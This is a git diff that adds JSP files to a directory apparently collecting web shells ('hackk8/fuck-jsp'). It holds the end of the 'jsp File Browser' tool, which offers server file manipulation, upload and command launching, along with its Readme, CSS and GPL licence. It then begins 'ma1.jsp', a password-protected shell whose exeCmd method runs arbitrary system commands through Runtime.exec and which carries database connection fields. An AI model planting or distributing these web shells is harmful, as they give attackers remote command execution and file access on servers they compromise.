= getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/Readme.txt b/jsp/hackk8/fuck-jsp/jspbrowser/Readme.txt new file mode 100644 index 0000000..337872d --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/Readme.txt @@ -0,0 +1,279 @@ +jsp File Browser version 1.2 +-------------------------------------------------------------------------------------- + +------------------------IMPORTANT + +With this jsp you can destroy important files on your system, it also could be +a serious security hole on your server. +Use this script only, if you know what you do. There is no warranty of any kind. + +------------------------REQUIREMENTS + +To use the File browser, you need a JSP1.1 compatible Web Server like Tomcat, Resin +or Jetty. +If you use the browser on webspace provided by an internet service provider, +it could be, that you are not allowed to go in some directories or execute +commands on the server, this will result in an exception. + +------------------------INSTALLATION + +Just copy the jsp file to any configured Web application. The author recommends to +protect the directory you copy the file into by password, to avoid abuse. + +------------------------SETTINGS + +If you want to change the standard style, you can create a css file in the directory +where Browser.jsp is located with the name "Browser.css". If you want choose another name +change this line in Browser.jsp: + private static final String CSS_NAME = "Browser.css"; +For the syntax, look at the example css file. + +If you click on a filename, the file will be opened in an new window. If you want that file +opened in your current window, change this line: + private static final boolean USE_POPUP = true; +to + private static final boolean USE_POPUP = false; + +If you hold the mouse cursor over a directory name, a tooltip with +the first ten entries of this directory show up. This feature can lead to performance issues. If +you observe slow loading times you should change this line: + private static final boolean USE_DIR_PREVIEW = true; +to + private static final boolean USE_DIR_PREVIEW = false; + +You could also change the number of entries in the preview by changing this line: + private static final int DIR_PREVIEW_NUMBER = 10; + +If you would like to execute commands on the server, you have to specify a +command line interpreter and the parameter to execute a command. +This is the parameter for windows: + private static final String[] COMMAND_INTERPRETER = {"cmd","/C"}; + +The maximum time in ms a command is allowed to run before it will be terminated is specified +by this line: + private static final long MAX_PROCESS_RUNNING_TIME = 30000; + +You can restrict file browsing and manipulation by setting + private static final boolean RESTRICT_BROWSING = true; +You can choose between whitelist restriction, that means the user is allowed to browse only in +directories, which are lower than RESTRICT_PATH, or blacklist restriction, which allows +the user to access all directories besides RESTRICT_PATH. + private static final boolean RESTRICT_WHITELIST = true; +You can set more than one directory in RESTRICT_PATH, seperated by semicolon. + +It is also possible to make the file browser read-only. All operations which change the +file structure (besides upload and native command execution) are forbidden and turned off. +To achieve this change + private static final boolean READ_ONLY = false; +to + private static final boolean READ_ONLY = true; +. + +You can also turn off upload with + private static final boolean ALLOW_UPLOAD = false; . + +If you restrict file access it is also recommend to forbid native command execution by +changing + private static final boolean NATIVE_COMMANDS = true; +to + private static final boolean NATIVE_COMMANDS = false; +. + +------------------------USAGE + +This JSP program allows remote web-based file access and manipulation. +You can copy, create, move, rename and delete files. +Text files can be edited and groups of files and folders can be downloaded +as a single zip file that is created on the fly. + +http://server/webapp/Browser.jsp +or +http://server/webapp/Browser.jsp?dir=[Directory on the server] + +You do not need a javascript capable browser, but it looks nicer with it. + +If you want to copy or move a file, please enter the target directory name in the +edit field (absolute or relative). If you want to create a new file or directory, +enter the name in the edit field. + +If you click on a header name (e.g. size) the entries will be sorted by this property. +If you click two times, they will be sorted descending. + +The button "Download as zip" let you download the selected directories and files packed as +one zip file. + +The buttons "Delete Files", "Move Files", "Copy Files", delete, move and copy also selected +directories with subdirectories. + +If you click on a .zip or .jar filename, you will see the entries of the packed file. +You can unpack .zip, .jar and .gz direct on the server. For this filetype the entry in the +last column is "Unpack". If you click at the "Unpack" link, the file will be unpacked in +the current folder. Note, that you can only unpack a file, if no entry of the packed file +already exist in the directory (no overwriting). If you want to unpack this file, you have +to delete the files on the server which correspond to the entries. This feature is very useful, +if you would like to upload more than one file. Zip the files together on your computer, +then upload the zip file and extract it on the server. + +You can execute commands on the server (if you are allowed to) by clicking the "Launch command" +button, but beware that you cannot interact with the program. If the execution time of the program +is longer than MAX_PROCESS_RUNNING_TIME (standard: 30 sec.) the program will be killed. + +If you click on a file, it will be shown, if the MIME Type is supported. +The following MIME Types are supported: + +.png image/png +.jpg, .jpeg image/jpeg +.gif image/gif +.tiff image/tiff +.svg image/svg+xml +.pdf application/pdf +.htm, .html, .shtml text/html +.xml text/xml +.avi video/x-msvideo +.mov video/quicktime +.mpg, .mpeg, .mpe video/mpeg +.rtf application/rtf +.mid, .midi, audio/x-midi +.xl,.xls,.xlv,.xla,.xlb,.xlt,.xlm,.xlk application/excel +.doc, .dot application/msword +.mp3 audio/mp3 +.ogg audio/ogg +else text/plain + +------------------------SHORTKEYS + +You can use the following shortkeys for better handling: + +r Rename file +m Move file +y Copy file +Del Delete file +l Launch command +z Download selected files as zip +c Create file +d Create directory + +------------------------KNOWN BUGS + +The JVM from windows will sometimes displays a message box on the server, +if you try to access an empty removable drive. There will be no respond from +the server until the message box is closed. +If someone knows how to fix this, please write me a mail. +Removable drives will not be shown on the list, if you add them to this +property: + +private static final String[] FORBIDDEN_DRIVES= {"a:\\"} +like e.g. +private static final String[] FORBIDDEN_DRIVES= {"a:\\", "d:\\", "e:\\"} + +------------------------CONTACT + +Boris von Loesch +boris@vonloesch.de + +------------------------CHANGELOG +1.2 (21.07.2006) +- Shortkeys +- Filter file table +- Fix a bug which appears with Tomcat +- Add parameter to turn jsp filebrowser to a read-only version +- Add parameter to disallow uploads (even in the read-only version) +- Nicer layout +- Javascript will now be cached by the browser therefore smaller page size +- Turned off directory preview by default, because it uses too much resources + +1.1a (27.08.2004) +- killed a bug, which appears if you view or download files +- fix upload time display + +1.1 (20.08.2004) +- Upload monitor +- Restrict file access + +1.0 (13.04.2004) +- if you click two times on a table header, it will be sorted descending +- sort parameter is memorized +- bugfixes (14,11,15) +- added some mime types + +1.0RC2 (02.02.2004) +- only bugfixes (3,4,6,9) + +1.0RC1 (17.11.2003) +Thanks to David Cowan for code contribution (buffering), bug fixing and testing +- execute native shell commands +- quick change to lower directories paths +- solve homepath problem with Oracle oc4j +- remove two bugs in the upload routine +- add war file unpack and view support +- remove some html errors (page is now valid HTML 4.1 Transitional) +- add buffering for download of files and zip file creation, this increases the speed + +0.6 (14.10.2003) +Thanks to David Levine for bug fixes +- Refactor parts of the code +- Viewing and unpacking of .zip, .jar and .gz files on the server +- Customizable layout via external css file (optional) +- Distinction between error and success messages +- Open File in a new window +- "Select all" checkbox +- More options +- Some small changes and bugfixes + +0.5 (20.08.2003) +Greetings to Taylor Bastien who contributed a lot of code for this release +- Renaming of files +- File extension in an extra column +- variable filesize unit (bytes, KB or MB) +- Directory preview via tooltip (simple hold the mousecursor over a directory name and + a tooltip with the first ten entries will appear) +- Summary (number and size of all files in the current directory) +- Text editor can save files with dos/windows or unix line ending +- many small changes + +0.4 (17.05.2003) +- It does not longer need a temporary directory ! +- Jsp 1.1 compatible (works now also in Tomcat 3) +- The file editor can now save the edited file with a new name and can make a backup +- selected row is marked by color and the checkbox can be selected by click at any place in the row + (works only with Javascript) +- some new MIME types (xml, png, svg) +- unreadable files and directories are marked (not selectable) +- write protected files and directories are marked (italic) +- if no dir parameter is assigned, the home directory of the browser will be displayed +- some bugs killed + +0.3 +- Output is HTML 4.01 conform, should now be netscape>4 compatible +- Messages to indicate the status of an operation +- Many bugs killed +- Tooltips + +0.2 +- First release + +CREDITS +Taylor Bastien +David Levine +David Cowan +Lieven Govaerts + +LICENSE + +jsp File browser +Copyright (C) 2003-2006 Boris von Loesch + +This program is free software; you can redistribute it and/or modify it under +the terms of the GNU General Public License as published by the +Free Software Foundation; either version 2 of the License, or (at your option) +any later version. + +This program is distributed in the hope that it will be useful, but +WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or +FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. + +You should have received a copy of the GNU General Public License along with +this program; if not, write to the +Free Software Foundation, Inc., +59 Temple Place, Suite 330, +Boston, MA 02111-1307 USA diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/example-css.css b/jsp/hackk8/fuck-jsp/jspbrowser/example-css.css new file mode 100644 index 0000000..cdbbbd9 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/example-css.css @@ -0,0 +1,50 @@ +input.button { background-color: #EF9C00; + color: #8C5900; + border: 2px outset #EF9C00; } +input.button:Hover { color: #444444 } + +input { background-color:#FDEBCF; + border: 2px inset #FDEBCF } + +table.filelist { background-color:#FDE2B8; + width:100%; + border:3px solid #ffffff } +th { background-color:#BC001D; + font-size: 10pt; + color:#022F55 } + +tr.mouseout { background-color:#F5BA5C; } +tr.mouseout td {border:1px solid #F5BA5C;} + +tr.mousein { background-color:#EF9C00; } +tr.mousein td { border-top:1px solid #3399ff; + border-bottom:1px solid #3399FF; + border-left:1px solid #EF9C00; + border-right:1px solid #EF9C00; } +tr.checked { background-color:#B57600 } +tr.checked td {border:1px solid #B57600;} + +tr.mousechecked { background-color:#8C5900 } +tr.mousechecked td {border:1px solid #8C5900;} + +td { font-family:Verdana, Arial, Helvetica, sans-serif; + font-size: 7pt; + color: #FFF5E8; } + +td.message { background-color: #FFFF00; + color: #000000; + text-align:center; + font-weight:bold } +.formular {margin: 1px; background-color:#ffffff; padding: 1em; border:1px solid #000000;} +.formular2 {margin: 1px;} + +A { text-decoration: none; + color: #005073 + } +A:Hover { color : #022F55; + text-decoration : underline; } +BODY { font-family:Verdana, Arial, Helvetica, sans-serif; + font-size: 8pt; + color: #666666; + background-color: #FDE2B8; + } diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/gpl.txt b/jsp/hackk8/fuck-jsp/jspbrowser/gpl.txt new file mode 100644 index 0000000..78337b6 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/gpl.txt @@ -0,0 +1,222 @@ + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/ma1.jsp b/jsp/hackk8/fuck-jsp/ma1.jsp new file mode 100644 index 0000000..1176511 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/ma1.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "admin"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { +if (password.equals(_password)) { +return true; +} else { +return false; +} +} + +public String HTMLEncode(String str) { +str = str.replaceAll(" ", " "); +str = str.replaceAll("<", "<"); +str = str.replaceAll(">", ">"); +str = str.replaceAll("\r\n", "
    "); + +return str; +} + +public String Unicode2GB(String str) { +String sRet = null; + +try { +sRet = new String(str.getBytes("ISO8859_1"), _encodeType); +} catch (Exception e) { +sRet = str; +} + +return sRet; +} + +public String exeCmd(String cmd) { +Runtime runtime = Runtime.getRuntime(); +Process proc = null; +String retStr = ""; +InputStreamReader insReader = null; +char[] tmpBuffer = new char[1024]; +int nRet = 0; + +try { +proc = runtime.exec(cmd); +insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + +while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { +retStr += new String(tmpBuffer, 0, nRet); +} + +insReader.close(); +retStr = HTMLEncode(retStr); +} catch (Exception e) { +retStr = "bad command \"" + cmd + "\""; +} finally { +return retStr; +} +} + +public String pathConvert(String path) { +String sRet = path.replace('\\', '/'); +File file = new File(path); + +if (file.getParent() != null) { +if (file.isDirectory()) { +if (! sRet.endsWith("/")) +sRet += "/"; +} +} else { +if (! sRet.endsWith("/")) +sRet += "/"; +} + +return sRet; +} + +public String strCut(String str, int len) { +String sRet; + +len -= 3; + +if (str.getBytes().length <= len) { +sRet = str; +} else { +try { +sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; +} catch (Exception e) { +sRet = str; +} +} + +return sRet; +} + 